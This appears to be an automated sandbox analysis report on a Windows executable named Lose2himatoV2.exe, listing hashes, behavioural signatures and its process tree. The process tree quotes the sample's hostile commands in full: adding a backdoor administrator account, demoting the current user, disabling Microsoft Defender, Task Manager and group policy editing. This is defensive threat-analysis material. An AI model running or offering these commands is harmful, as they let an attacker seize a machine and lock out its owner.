Analysis

max time kernel: 76s
max time network: 81s
platform: windows11-21h2_x64
resource: win11-20241007-en
resource tags: arch:x64, arch:x86, image:win11-20241007-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 04/01/2025, 23:24

Static task: static1

Behavioral task: behavioral1
Sample: Lose2himatoV2.exe
Resource: win10ltsc2021-20241211-en

Behavioral task: behavioral2
Sample: Lose2himatoV2.exe
Resource: win11-20241007-en

Errors

General

Target: Lose2himatoV2.exe
Size: 138.5MB
MD5: b13b58171063faf469d7cffd178644a6
SHA1: 0cc178b5db25710be4181e0f15b70ca8c3049ef2
SHA256: 974cb763c5670a8c187c5e7108964741b8c59590ac35f3bdccb2e069e2ec7506
SHA512: 511d96d59fc5646aead6f0bf16ecbe9f9e1ab60e05954b02d2b53c7686df2ccfe85374388fc5aece04e50bd37ff3411319c7107d52cc33c3af819fb47ab570e3
SSDEEP: 786432:Y93oFjO6NbbB6uTE/kbsV0jmB/gWD4otJ0njnEMIQAhpLoMS/QVQfmLh0VPdTtLH:Y9SjOsbbUng40ihpEX/QVQfmLmxHXutU
Malware Config

Signatures

- Grants admin privileges (1 TTPs)
  Uses net.exe to modify the user's privileges.

- Disables Task Manager via registry modification

- Indicator Removal: Network Share Connection Removal (1 TTPs, 1 IoCs)
  Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
  pid | Process
  1396 | cmd.exe

- Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
  flow | ioc
  2 | discord.com
  13 | discord.com

- Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
  description | ioc | Process
  Set value (str) | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\MySingleFileApp\\wallpaper.bmp" | Lose2himatoV2.exe

- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

- Permission Groups Discovery: Local Groups (1 TTPs)
  Attempt to find local system groups and permission settings.

- System Location Discovery: System Language Discovery (1 TTPs, 29 IoCs)
  Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | shutdown.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net1.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net1.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net1.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Lose2himatoV2.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | explorer.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net1.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net.exe

- Enumerates system info in registry (2 TTPs, 3 IoCs)
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe

- Modifies data under HKEY_USERS (15 IoCs)
  description | ioc | Process
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | LogonUI.exe
  Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 | LogonUI.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | LogonUI.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | LogonUI.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | LogonUI.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | LogonUI.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | LogonUI.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "209" | LogonUI.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | LogonUI.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" | LogonUI.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | LogonUI.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" | LogonUI.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" | LogonUI.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" | LogonUI.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" | LogonUI.exe

- Modifies registry class (2 IoCs)
  description | ioc | Process
  Key created | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings | explorer.exe
  Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2410826464-2353372766-2364966905-1000\{C821189A-2B7B-46E6-A626-F01F169BC4ED} | msedge.exe

- Runs net.exe

- Suspicious behavior: EnumeratesProcesses (14 IoCs)
  pid | Process
  4932 | msedge.exe
  4932 | msedge.exe
  4520 | msedge.exe
  4520 | msedge.exe
  4088 | msedge.exe
  4088 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  5772 | msedge.exe
  5772 | msedge.exe
  4660 | msedge.exe
  4660 | msedge.exe
  1088 | identity_helper.exe
  1088 | identity_helper.exe

- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (11 IoCs)
  pid | Process
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe

- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description | pid | Process
  Token: SeShutdownPrivilege | 5344 | shutdown.exe
  Token: SeRemoteShutdownPrivilege | 5344 | shutdown.exe

- Suspicious use of FindShellTrayWindow (26 IoCs)
  pid | Process
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe

- Suspicious use of SendNotifyMessage (12 IoCs)
  pid | Process
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe
  4692 | msedge.exe

- Suspicious use of SetWindowsHookEx (2 IoCs)
  pid | Process
  6136 | PickerHost.exe
  3464 | LogonUI.exe

- Suspicious use of WriteProcessMemory (64 IoCs)
  description | pid | Process | procid_target
  PID 4760 wrote to memory of 5028 | 4760 | Lose2himatoV2.exe | 79
  PID 4760 wrote to memory of 5028 | 4760 | Lose2himatoV2.exe | 79
  PID 4760 wrote to memory of 5028 | 4760 | Lose2himatoV2.exe | 79
  PID 4760 wrote to memory of 4204 | 4760 | Lose2himatoV2.exe | 81
  PID 4760 wrote to memory of 4204 | 4760 | Lose2himatoV2.exe | 81
  PID 4760 wrote to memory of 4204 | 4760 | Lose2himatoV2.exe | 81
  PID 4760 wrote to memory of 2732 | 4760 | Lose2himatoV2.exe | 83
  PID 4760 wrote to memory of 2732 | 4760 | Lose2himatoV2.exe | 83
  PID 4760 wrote to memory of 2732 | 4760 | Lose2himatoV2.exe | 83
  PID 4760 wrote to memory of 1396 | 4760 | Lose2himatoV2.exe | 84
  PID 4760 wrote to memory of 1396 | 4760 | Lose2himatoV2.exe | 84
  PID 4760 wrote to memory of 1396 | 4760 | Lose2himatoV2.exe | 84
  PID 4760 wrote to memory of 2500 | 4760 | Lose2himatoV2.exe | 85
  PID 4760 wrote to memory of 2500 | 4760 | Lose2himatoV2.exe | 85
  PID 4760 wrote to memory of 2500 | 4760 | Lose2himatoV2.exe | 85
  PID 4760 wrote to memory of 3580 | 4760 | Lose2himatoV2.exe | 89
  PID 4760 wrote to memory of 3580 | 4760 | Lose2himatoV2.exe | 89
  PID 4760 wrote to memory of 3580 | 4760 | Lose2himatoV2.exe | 89
  PID 5028 wrote to memory of 3972 | 5028 | cmd.exe | 90
  PID 5028 wrote to memory of 3972 | 5028 | cmd.exe | 90
  PID 5028 wrote to memory of 3972 | 5028 | cmd.exe | 90
  PID 4204 wrote to memory of 3432 | 4204 | cmd.exe | 91
  PID 4204 wrote to memory of 3432 | 4204 | cmd.exe | 91
  PID 4204 wrote to memory of 3432 | 4204 | cmd.exe | 91
  PID 3432 wrote to memory of 3924 | 3432 | net.exe | 92
  PID 3432 wrote to memory of 3924 | 3432 | net.exe | 92
  PID 3432 wrote to memory of 3924 | 3432 | net.exe | 92
  PID 3972 wrote to memory of 2708 | 3972 | net.exe | 93
  PID 3972 wrote to memory of 2708 | 3972 | net.exe | 93
  PID 3972 wrote to memory of 2708 | 3972 | net.exe | 93
  PID 2732 wrote to memory of 2612 | 2732 | cmd.exe | 94
  PID 2732 wrote to memory of 2612 | 2732 | cmd.exe | 94
  PID 2732 wrote to memory of 2612 | 2732 | cmd.exe | 94
  PID 1396 wrote to memory of 2124 | 1396 | cmd.exe | 95
  PID 1396 wrote to memory of 2124 | 1396 | cmd.exe | 95
  PID 1396 wrote to memory of 2124 | 1396 | cmd.exe | 95
  PID 2500 wrote to memory of 3168 | 2500 | cmd.exe | 96
  PID 2500 wrote to memory of 3168 | 2500 | cmd.exe | 96
  PID 2500 wrote to memory of 3168 | 2500 | cmd.exe | 96
  PID 2124 wrote to memory of 2028 | 2124 | net.exe | 97
  PID 2124 wrote to memory of 2028 | 2124 | net.exe | 97
  PID 2124 wrote to memory of 2028 | 2124 | net.exe | 97
  PID 2612 wrote to memory of 4072 | 2612 | net.exe | 98
  PID 2612 wrote to memory of 4072 | 2612 | net.exe | 98
  PID 2612 wrote to memory of 4072 | 2612 | net.exe | 98
  PID 4760 wrote to memory of 2812 | 4760 | Lose2himatoV2.exe | 102
  PID 4760 wrote to memory of 2812 | 4760 | Lose2himatoV2.exe | 102
  PID 4760 wrote to memory of 2812 | 4760 | Lose2himatoV2.exe | 102
  PID 4760 wrote to memory of 4236 | 4760 | Lose2himatoV2.exe | 104
  PID 4760 wrote to memory of 4236 | 4760 | Lose2himatoV2.exe | 104
  PID 4760 wrote to memory of 4236 | 4760 | Lose2himatoV2.exe | 104
  PID 4236 wrote to memory of 4428 | 4236 | cmd.exe | 106
  PID 4236 wrote to memory of 4428 | 4236 | cmd.exe | 106
  PID 4236 wrote to memory of 4428 | 4236 | cmd.exe | 106
  PID 2812 wrote to memory of 2624 | 2812 | cmd.exe | 107
  PID 2812 wrote to memory of 2624 | 2812 | cmd.exe | 107
  PID 2812 wrote to memory of 2624 | 2812 | cmd.exe | 107
  PID 4760 wrote to memory of 3488 | 4760 | Lose2himatoV2.exe | 108
  PID 4760 wrote to memory of 3488 | 4760 | Lose2himatoV2.exe | 108
  PID 4760 wrote to memory of 3488 | 4760 | Lose2himatoV2.exe | 108
  PID 4760 wrote to memory of 564 | 4760 | Lose2himatoV2.exe | 110
  PID 4760 wrote to memory of 564 | 4760 | Lose2himatoV2.exe | 110
  PID 4760 wrote to memory of 564 | 4760 | Lose2himatoV2.exe | 110
  PID 3488 wrote to memory of 4268 | 3488 | cmd.exe | 112
Processes

- C:\Users\Admin\AppData\Local\Temp\Lose2himatoV2.exe (PID 4760)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Lose2himatoV2.exe"
  Signatures: Sets desktop wallpaper using registry; System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\cmd.exe (PID 5028)
    Command line: "C:\Windows\System32\cmd.exe" /c net user Lose2himato /add
    Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\net.exe (PID 3972)
      Command line: net user Lose2himato /add
      Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\net1.exe (PID 2708)
        Command line: C:\Windows\system32\net1 user Lose2himato /add
        Signatures: System Location Discovery: System Language Discovery
  - C:\Windows\SysWOW64\cmd.exe (PID 4204)
    Command line: "C:\Windows\System32\cmd.exe" /c net user Lose2himato dumbass
    Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\net.exe (PID 3432)
      Command line: net user Lose2himato dumbass
      Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\net1.exe (PID 3924)
        Command line: C:\Windows\system32\net1 user Lose2himato dumbass
        Signatures: System Location Discovery: System Language Discovery
  - C:\Windows\SysWOW64\cmd.exe (PID 2732)
    Command line: "C:\Windows\System32\cmd.exe" /c net localgroup Administrators "Lose2himato" /add
    Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\net.exe (PID 2612)
      Command line: net localgroup Administrators "Lose2himato" /add
      Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\net1.exe (PID 4072)
        Command line: C:\Windows\system32\net1 localgroup Administrators "Lose2himato" /add
        Signatures: System Location Discovery: System Language Discovery
  - C:\Windows\SysWOW64\cmd.exe (PID 1396)
    Command line: "C:\Windows\System32\cmd.exe" /c net localgroup Administrators "%USERNAME%" /delete
    Signatures: Indicator Removal: Network Share Connection Removal; System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\net.exe (PID 2124)
      Command line: net localgroup Administrators "Admin" /delete
      Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\net1.exe (PID 2028)
        Command line: C:\Windows\system32\net1 localgroup Administrators "Admin" /delete
        Signatures: System Location Discovery: System Language Discovery
  - C:\Windows\SysWOW64\cmd.exe (PID 2500)
    Command line: "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\reg.exe (PID 3168)
      Command line: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      Signatures: System Location Discovery: System Language Discovery
  - C:\Windows\SysWOW64\explorer.exe (PID 3580)
    Command line: "explorer.exe"
    Signatures: System Location Discovery: System Language Discovery; Modifies registry class
  - C:\Windows\SysWOW64\cmd.exe (PID 2812)
    Command line: "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f
    Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\reg.exe (PID 2624)
      Command line: REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f
      Signatures: System Location Discovery: System Language Discovery
  - C:\Windows\SysWOW64\cmd.exe (PID 4236)
    Command line: "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f
    Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\reg.exe (PID 4428)
      Command line: REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f
      Signatures: System Location Discovery: System Language Discovery
  - C:\Windows\SysWOW64\cmd.exe (PID 3488)
    Command line: "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\reg.exe (PID 4268)
      Command line: REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      Signatures: System Location Discovery: System Language Discovery
  - C:\Windows\SysWOW64\cmd.exe (PID 564)
    Command line: "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f
    Signatures: System Location Discovery: System Language Discovery
    - C:\Windows\SysWOW64\reg.exe (PID 4396)
      Command line: REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f
      Signatures: System Location Discovery: System Language Discovery
  - C:\Windows\SysWOW64\cmd.exe (PID 3496)
    Command line: "C:\Windows\System32\cmd.exe" /c start https://x.com/Lose2hxm4to
    Signatures: System Location Discovery: System Language Discovery
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2948)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://x.com/Lose2hxm4to
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1468)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb67303cb8,0x7ffb67303cc8,0x7ffb67303cd8
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4656)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1828,2107120149633614801,5472195119550670762,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1816 /prefetch:2
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4932)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1828,2107120149633614801,5472195119550670762,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3
        Signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Windows\SysWOW64\cmd.exe (PID 3300)
    Command line: "C:\Windows\System32\cmd.exe" /c start https://discord.gg/UkEYppsAck
    Signatures: System Location Discovery: System Language Discovery
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3968)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/UkEYppsAck
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2016)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffb67303cb8,0x7ffb67303cc8,0x7ffb67303cd8
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4020)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,3416842724557945885,16810939765191857453,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1992 /prefetch:2
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4088)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1956,3416842724557945885,16810939765191857453,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 /prefetch:3
        Signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Windows\SysWOW64\cmd.exe (PID 1568)
    Command line: "C:\Windows\System32\cmd.exe" /c start https://www.paypal.com/paypalme/himato666
    Signatures: System Location Discovery: System Language Discovery
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4692)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/paypalme/himato666
      Signatures: Enumerates system info in registry; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1016)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb67303cb8,0x7ffb67303cc8,0x7ffb67303cd8
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3000)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1900 /prefetch:2
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4520)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 /prefetch:3
        Signatures: Suspicious behavior: EnumeratesProcesses
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3912)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2572 /prefetch:8
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3084)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3880)
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,5914376409565511752,1905001811894027167,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1216)
